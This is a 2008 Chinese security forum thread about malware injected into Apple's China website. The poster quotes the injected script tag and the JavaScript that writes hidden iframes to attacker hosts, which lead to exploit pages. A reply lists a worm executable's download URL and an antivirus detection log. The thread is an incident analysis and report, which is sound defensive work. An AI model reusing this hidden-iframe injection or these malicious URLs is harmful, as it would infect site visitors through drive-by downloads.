真爽，apple中国官方站挂马。[官方已修复]

ALEXBLAIR

难道是让大家都用mac  os么？
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
看看今天的主角~
http://www.apple.com.cn

出问题的脚本位于head部分

1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   
2. "http://www.w3.org/TR/html4/loose.dtd">
   
3. 
   
4. <script src=http://1.hao929.cn/999.js></script>
   
5. 
   
6. <!---equiv="content-type" content="text/html;
   
7. charset=gb2312">

复制代码

被加载的js的关键语句是：

1. document.writeln("<\/SCRIPT>");
   
2. document.writeln("<iframe src=http:\/\/c.j8j8.biz\/107\/ width=50 height=0><\/iframe> ");
   
3. document.writeln("<iframe src=http:\/\/1.hao929.cn\/999.htm width=50 height=0><\/iframe> ");

复制代码

顺便找出其他的东西

1. http://c.j8j8.biz/107/
   
2. http://1.hao929.cn/999.htm

复制代码

继续分析

1. http://c.j8j8.biz/107/

复制代码

的内容为

1. <html><TITLE>index</TITLE><BODY>
   
2. <iframe src="" width=100 height=1></iframe>
   
3. <iframe src="r.htm" width=100 height=1></iframe>
   
4. <iframe src="1.htm" width=100 height=1></iframe>
   
5. </body></html>
   
6. <script src='http://s109.cnzz.com/stat.php?id=418410&web_id=418410' language='JavaScript' charset='gb2312'></script>

复制代码

很恶俗的出现了
1.htm
r.htm
这两个东西太长了，打包在附件里，是两个漏洞利用脚本。

刚才的

1. http://1.hao929.cn/999.htm

复制代码

也一样是漏洞利用脚本

继续分析下去就交给大家了。

这年头apple都不安全了~~

已经通知了管理员，估计不久就可以修复了（发出的邮件快照）



39分钟后，网站被修复了~~~速度不错~比以前的太平洋不知道快了多少倍。现在已经正常了。


[ 本帖最后由 ALEXBLAIR 于 2008-3-14 01:42 编辑 ]

jimmyleo

我只知道那个广告歌 很嚣张

ALEXBLAIR

阿米又出现了~~~
抱走~~

ALEXBLAIR

苹果的反应真快，已经被修复了~~~

jimmyleo

还让人家看你的真爽的感叹...

对了 你那个邮件终端用的是什么？ OE？

QQ777888

没有吧,我刚去了还想来这里发帖呢,没想到已经有了

ALEXBLAIR

原帖由 jimmyleo 于 2008-3-14 01:36 发表
还让人家看你的真爽的感叹...

对了 你那个邮件终端用的是什么？ OE？

那是当然，apple需要灵感，我能创造灵感~~~
邮件客户端是outlook~~

jimmyleo

outlook被我封存到现在...

是时候考虑 选个 客户端了... 唉 不用多好..

linkscanner真好...

明天晚上可能会写篇文章 附带个小工具

ALEXBLAIR

原帖由 jimmyleo 于 2008-3-14 01:47 发表
outlook被我封存到现在...

是时候考虑 选个 客户端了... 唉 不用多好..

linkscanner真好...

明天晚上可能会写篇文章 附带个小工具

outlook的确是不错的东西，配合office系列使用很稳定和可靠，而且，支持的服务多，通用性广还可以和google的日历互通~~很爽的东西 ，不过自带的OE就和垃圾没什么两样了


阿米要发布个小工具了？

紧紧抱住阿米，然后~~~

[ 本帖最后由 ALEXBLAIR 于 2008-3-14 01:52 编辑 ]

mofunzone

http://vvv.123sky.biz/107/107.exe
这个
Starting the file scan:

Begin scan in 'C:\TDDOWNLOAD\107.exe'
C:\TDDOWNLOAD\
  107.exe
    [0] Archive type: Runtime Packed
    --> Object
        [DETECTION] Contains detection pattern of the worm WORM/Cekar.A
      [NOTE]      The file was deleted!